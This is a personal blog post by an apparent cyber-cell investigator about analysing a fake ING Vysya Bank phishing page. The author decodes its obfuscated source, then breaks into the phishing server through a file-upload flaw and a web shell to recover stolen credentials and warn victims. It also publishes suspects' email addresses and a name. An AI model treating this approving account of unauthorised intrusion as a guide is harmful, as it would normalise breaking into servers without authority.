August 9, 2017

Phishing in a well

I received an official mail asking to confirm if a mail they have received was a legitimate one, or is something suspicious.
The e-mail had a reply-to address of update@ingvysyabank.co.in

The domain ingvysyabank.co.in is a genuine domain registered by ING Vysya Bank but is not active.
[Note: Click on Images to enlarge] 



Now, I had to check if the e-mail ID really exists.




Without further ado, I started looking into the mail, and it also had an attachment.

I downloaded the attachment (a html file) and opened it in the web browser. It was a (fake) login page of ING Vysya Bank with a form asking for user credentials. I wanted to know where the data would be submitted when a user clicks on the 'Submit' button, so entered random details and clicked on 'Submit' button. I could see in the status bar of my browser that the data is going to some IP 207.210.xx.xxx and then it was redirecting us to the genuine website of ING Vysya Bank.

So far so good. I just wanted to check if the page was working as it was meant to.


Next step was to see the source code of the html page to find where exactly the data was going on the click of the 'Submit' button.

The source code was obfuscated using the encodeURI() function of JavaScript and on run-time it was being decoded. The source code was Greek to me because of the obfuscation. I had to somehow decode the content to view the source code in clear text. I came to know about the decodeURI() function which was the need of the hour. I used this technique to decode the source code into clear text. The data was double-encoded, so I had to double-decode the content using the unescape() or decodeURI() function to get the clear text, which I finally got after sometime.

Now I knew what exactly I need to look for, in the source code. It was the "<form action>" tag, which along with the request method of "POST" would submit the data to some host.

It was some "http://207.210.xx.xxx/~camion/remax/yes/is_vector.php".

Great! Now we know where our data is going to.
By the way, you already know that we cannot view the (actual) source code of a php file right?
It pre-processes before displaying the page. So, we can view only the code of the displayed page, but not the code which created the output.

So, now our aim was to see the code of this file "is_vector.php". I did some directory traversals, to browse through various directories, and found a "file upload" vulnerability in some page there, and thats where I fired my favorite madspot shell, and we had access to all the files on that directory and all other sub-directories.

It took some time to find out which directory had that juicy information relevant to this case.
Okay, but first I was interested in identifying the last accessed IP from the access logs, and it was 41.206.15.41.
A quick WHOIS lookup gave the information that the IP belongs to Nigeria. (It could be a proxy or might be used for RDP but anyways thats not what we want to find out, atleast in this case)
   

Now moving to view the actual source code of the php file "is_vector.php", I traversed through the path to reach the file viewed the source code and found that the data was being mailed to three IDs namely cyber_crime52@yahoo.com . mrlogin801@gmail.com , and johncooperesq@live.com




To know the potential victims of this attack, I would have to hack (get) into the above accounts and check their inboxes for the details they have received.

Luckily, I believe somebody was insecure amongst them and had also added a code in the end of that php file which would also append the data into a text file in some directory there, along with sending the data via their mailer to the above mail IDs.

The mailer was found to be configured by some Heru Kusnadi (heru.kusna@gmail.com) who might be the main person behind this, or could just be another partner in crime.




Uhm, anyways after deep-walking into those dozens of directories, finally I got the data related to the dump of credentials already submitted by some potential victims.


As I was not concerned directly with the victims outside India, I was looking for some data related to Indians. I could find a dozen of valid responses (proper credentials) and luckily they had fortunately or unfortunately filled their genuine mobile numbers too. It was easier for the team to contact and inform them to change their credentials (ATM PIN, transaction password, email password, etc).



By the grace of Almighty, there was no loss to any of our potential victims and they had changed their credentials. They thanked us for the timely help and some of them also burst into tears, but this was out of happiness as some victims had recently transfered their entire savings into this one account of theirs.

What did I get in return? Happiness in their voices, and a feeling of content both individually and also towards the Department which they now trust.
Well, that is more than enough! :)
There was no official complaint as-such but sometimes we take the action like 'Minority Report' ;)

Anyways, If you feel anything suspicious (as in mails, lottery SMSes, etc) kindly report it to your local Cyber Cells via mails atleast or dial 1930 and/or report at cybercrime.gov.in

The complete documentation including the "Technical Process" can be provided if you want to study the details. Shoot me a mail.

See you soon.

Greetz to The CliQue - Guy244, GSM50, SajjutXt, KANK, F-roZ, i-maD

Regards,
itsmeRiF
The Logical Kid

Disclaimer: Specifically added the mail IDs of the suspects in a searchable method so that it can be indexed on Google when you doubt their mails and search for their e-mail IDs. I hope this post gets displayed in the search results.